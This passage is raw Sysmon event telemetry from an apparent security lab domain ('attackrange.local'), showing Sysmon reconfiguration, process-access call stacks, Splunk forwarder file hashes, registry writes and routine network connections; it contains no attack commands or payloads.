07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\OptionsDWORD (0x00000007) 12241200x80000000000000001050266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Rules 12241200x80000000000000001050265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookup 12241200x80000000000000001050264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocation 
12241200x80000000000000001050263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithm 12241200x80000000000000001050262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Options 10341000x80000000000000001050261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:59.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:59.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:59.419{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.422{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c "C:\Program Files\ansible\AttackRangeSysmon.xml"C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001050253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=750EA789080C84D37C747409EF8118A5,SHA256=288FC82E1B5E02CA30B99220B958A8E5D603064B6BCB59D7999370C2E5B5168E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:57.931{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-15635-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4983F6A885320869D494F5F2E33196BC,SHA256=51628AA4F2E356C69B955E88424F428DCED52C1B9EA0E378D64668C09BFF1E1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=289C932C0685C56F3E411A901D46CEE6,SHA256=4D9983F4CE10AA119E42B1C7CC8C27C18785B1D5692CA9AD485C3B2877F2A788,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:00.416{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE483584B5721D6A257B590BBBA3C599,SHA256=6D3956DF78685A603F59824172E6D2CB8F3E1AA0C44560FEF95307F762C5BC6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:00.620{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=461650CCA838D01F5DE4020E377CCDE0,SHA256=3952425011BEABBEA01B291599305E155B3B569E6BBCED8CD7CA34EE8B13588E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:00.451{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A114D5F4DC5A6ADD829A28B16DD95646,SHA256=410E7A98D69D140B6CDF9E576853EE35DBB6C5E00590C7FE253C7C327053BFD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:00.451{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF16F01D00B9A09AF65B2E385B0CF54C,SHA256=06CA2F96AFDD9733DA427187B32F5000CA299D4206D4857366C1FBF43A1F1198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:00.236{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74FBE259AE0D9C8C66688D0176F67F7D,SHA256=524EF3DCBC827970F76F4FBC867EAB1E871F19021F7309C528807DE73CC72EAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:58.224{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57312-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000808226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:01.432{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1C4FE22B978E797AA298128CC2A943E,SHA256=F0D999643196B8A2014141051EB14E528F455BCC022F2F2E1F0C76823FCAE3CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.221{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal52194- 23542300x80000000000000001050279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:01.250{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33A0BF99A90609E5558F571828B88A28,SHA256=429B571DDE90493C91118AA9A56BD312C8CEF109F0B8856D119739EED106D236,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000808225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.832{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse10.0.1.15win-host-623.attackrange.local52194-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal53domain 354300x8000000000000000808224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.831{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:c810:752:c94:ffff-52194-truea00:10e:0:0:0:0:0:0ip-10-0-1-14.eu-central-1.compute.internal53domain 23542300x8000000000000000808229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:02.432{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0EE67369E23CFAD2A4831BD6AE92EC0,SHA256=516270A378E50D03ED82062E28D1AF26DEEF289056D51B4DE4E11F2E971EAD33,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.223{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57313-false10.0.1.14win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001050281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:02.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAD5916B4F3E5BD3B5A1D7AEFC521272,SHA256=C6A8CA02DF93F05F5767163EC963E99F626D87F27C5CF2F6E529446C2FD0E92E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:01.283{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57314-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000808227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.833{0C1E0330-048D-60E8-0100-00000000D001}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57313-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal445microsoft-ds 23542300x8000000000000000808230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:03.432{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE3921FA901C3771DDEE6A2EC3BC822B,SHA256=B4D3F784706980BF471D461D96664F82E5DB259A93A85739F79CC7C9FB5ACC3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:55.741{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51080-false10.0.1.12-8000- 23542300x80000000000000001050283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:03.269{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C12E26907120E5E6179D94DAE8C0E479,SHA256=0487F959E716DFE4C7B9DF4EAAB118BB6FF747ED282396844BD44FAC186DCCDE,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000808241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000808240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6588c6) 13241300x8000000000000000808239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0xfb2613d5) 13241300x8000000000000000808238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0x5cea7bd5) 13241300x8000000000000000808237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0xbeaee3d5) 
13241300x8000000000000000808236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000808235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6588c6) 13241300x8000000000000000808234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0xfb2613d5) 13241300x8000000000000000808233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0x5cea7bd5) 13241300x8000000000000000808232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0xbeaee3d5) 23542300x8000000000000000808231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:04.447{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E2F2AAC8E87CE142DEC107F14A0F787,SHA256=30AE750DE9B62A3BC6D09E915CB0986EAE4657CADD98A9063C8A0C47E25929AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:04.306{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AFD3379D9E7CA3E46299B0034D62CAA,SHA256=D3EF54E32ABCFBBB73F80CA5467040259EAEEEFA12CB0B379FEAB0F01CDA6E8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:05.306{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD13DC16F97E9180B4F22F5FF37A8794,SHA256=B4B3C07643DE6987E91006328C3BC390B247B9B8D13736E670DE4FC67284B5A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:05.463{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90804A9A47CD5D7B62AA2752DC3EEC73,SHA256=3F79AED33C246BB409CEC523AB0D590ACD4565036644B8076F77D65A677A4223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:06.479{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0AE3DA6C12AD23303F62B5593A47A83,SHA256=79A4D7933A8CBF11A25FBD05547DD4F22D3B098C795BD2B7BFF936D3BB5C35F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.321{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA8FB75B954AF228847CE8F96A871C3,SHA256=A256197B8C46C6F1C3D365448D84690032C1AB9DBC66061DB4802CDA1B46DC99,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.283{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla 
